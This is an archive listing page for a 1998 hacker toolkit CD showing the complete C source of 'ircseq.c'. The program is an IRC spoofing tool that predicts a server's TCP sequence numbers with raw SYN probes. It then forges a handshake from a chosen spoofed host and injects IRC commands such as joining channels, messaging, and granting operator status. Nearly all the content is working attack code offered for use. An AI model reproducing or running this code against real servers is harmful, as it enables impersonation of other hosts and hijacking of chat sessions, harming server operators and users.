home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Elite Hackers Toolkit
/
TheEliteHackersToolkitVolume1_1998.rar
/
HACKERS.BIN
/
hackers
/
ircseq.c
< prev
next >
Wrap
C/C++ Source or Header
|
1998-09-09
|
7KB
|
204 lines
/* */
/* iRC SEQUENCER v0.0001 = MUTUALLY DEVELOPED BY Z AND VECT0R-X */
/* Under Solaris try: */
/* gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb */
#include "tcpip.h"
unsigned long sp, sourceport = 23;
unsigned long dest, spoofed, src, nseq, tarport, temp;
char *nickn, *userid, *tempz, *message, *channel, *ircname, *current;
char heytew[255], hey[255], str[255], *string, *parseme;
char buf[4096];
int len, talk, rec, sen, i=1, adder, stringlen=0;
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
void main(int argc, char *argv[])
{
unsigned long fakesequence = 408618+getpid();
system("clear");
printf("iRC SEQUENCE - Writtin by z and vect0rx.\n\n");
if (argc != 8) {
fprintf(stderr,"Usage: %s <server> <port> <nick> <userid> <spoof> <ircname> <channel>\n\n",argv[0]);
fprintf(stderr," <server> - Site spoof is attempted on.\n");
fprintf(stderr," <port> - Port to access on <server>.\n");
fprintf(stderr," <nick> - Nickname for spoof to user.\n");
fprintf(stderr," <userid> - Account name of spoof.\n");
fprintf(stderr," <spoof> - Host to appear from.\n");
fprintf(stderr," <ircname> - Default is (*Unknown*).\n");
fprintf(stderr," (w/o #)<channel> - Initial channel (0 for none).\n");
exit(1);
}
tarport = atoi(argv[2]);
nickn = argv[3];
userid = argv[4];
ircname = argv[6];
channel = argv[7];
memset(&spoofedaddr,0,sizeof(spoofedaddr));
spoofedaddr.sin_family = AF_INET;
if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[5])) == -1) {
if ((host = gethostbyname(argv[5])) == NULL) {
printf("Unknown host %s.\n",argv[5]);
exit(1);
}
spoofedaddr.sin_family = host->h_addrtype;
memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length);
}
memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4);
memset(&addr,0,sizeof(addr));
addr.sin_family = AF_INET;
if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) {
if ((host = gethostbyname(argv[1])) == NULL) {
printf("Unknown host %s.\n",argv[1]);
exit(1);
}
addr.sin_family = host->h_addrtype;
memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length);
}
memcpy(&dest,(char *)&addr.sin_addr.s_addr,4);
if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
perror("error: recv socket");
exit(1);
}
if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("error: send socket");
exit(1);
}
/*
sen = openintf("eth0");
*/
gethostname(buf, 128);
if ((host=gethostbyname(buf))==NULL) {
fprintf(stderr, "Can't get my hostname!?\n");
exit(1);
}
memcpy(&src,host->h_addr,4);
sp=sourceport;
for(i=0;i<3;i++) {
sendtcppacket(sen, src, dest, &addr, TH_SYN, ++sourceport,
tarport, fakesequence, 0, NULL, 0);
for (;;) {
gettcppacket(rec,buf,sizeof(buf));
ip = (struct iphdr *) buf;
if (ip->saddr != dest) continue;
len = ip->ihl << 2;
tcp = (struct tcphdr *) (buf+len);
if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) {
nseq=htonl(tcp->th_seq);
adder=nseq-temp;
temp=nseq;
printf("Sequence returned is %lu, Offset is %lu\n",
nseq, adder);
sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport,
tarport, fakesequence, 0, NULL, 0);
break;
}
}
nseq+=adder;
}
sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sp,
tarport,fakesequence,0,NULL,0);
printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout);
usleep(10000);
printf("Using %lu for Offset.\n", adder);
printf("Next packet will be %lu.\n", nseq);
printf("%s!%s@%s on server %s:%d on channel %s\n",
nickn, userid, argv[5], argv[1], tarport, channel);
sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sp,
tarport,++fakesequence,++nseq,NULL,0);
printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout);
usleep(5000);
printf("Sending irc client handshake for %s.\n", nickn); fflush(stdout);
sprintf(str,"USER %s # # :%s\r\nNICK %s\r\nJOIN #%s\r\n",
userid, ircname, nickn, channel);
stringlen = strlen(str);
sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sp,
tarport,fakesequence,nseq,str,stringlen);
fakesequence+=stringlen;
current = channel;
for(;;) {
printf("%s:#%s> ", nickn, channel); fflush(stdout);
parseme = fgets(str, 255, stdin);
switch(parseme[0]) {
case '/' :
talk=0;
switch(parseme[1]) {
case 'r' :
printf("RAW:> "); fflush(stdout);
parseme = fgets(str, 255, stdin);
sprintf(str, parseme);
break;
case 'o' :
printf("OP WHO:> "); fflush(stdout);
parseme = fgets(str, 255, stdin);
sprintf(hey, "%s", parseme);
sprintf(str, "MODE #%s +o %s",
channel, hey);
break;
case 'm' :
printf("MSG WHO:> "); fflush(stdout);
parseme = fgets(str, 255, stdin);
strncpy(hey, parseme, strlen(parseme)-1);
printf("MSG %s WHAT:> ",hey); fflush(stdout);
tempz = fgets(str, 255, stdin);
sprintf(heytew, "%s", tempz);
sprintf(str, "PRIVMSG %s :%s", hey, heytew);
break;
case 'j' :
printf("JOIN:> "); fflush(stdout);
parseme = fgets(str, 255, stdin);
strncpy(hey, parseme, strlen(parseme));
strncpy(channel, parseme, strlen(parseme)-2);
sprintf(str, "JOIN :#%s", hey);
break;
case 'l' :
printf("PART:> "); fflush(stdout);
parseme = fgets(str, 255, stdin);
sprintf(hey, "%s", parseme);
sprintf(str, "PART :%s", hey);
break;
case 'q' :
printf("SIGNOFF:> "); fflush(stdout);
parseme = fgets(str, 255, stdin);
sprintf(hey, "%s", parseme);
sprintf(str, "QUIT :%s", hey);
break;
default:
printf("Invalid.\r\n");
break;
}
break;
default:
talk++;
break;
}
if (talk) {
sprintf(hey, "%s", parseme);
sprintf(str,"PRIVMSG #%s :%s\n", channel, hey);
}
stringlen = strlen(str);
printf("SENT TO SERVER:> %s",str);
sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sp,
tarport,fakesequence,nseq,str,stringlen);
fakesequence+=stringlen;
}
}
/*
*/
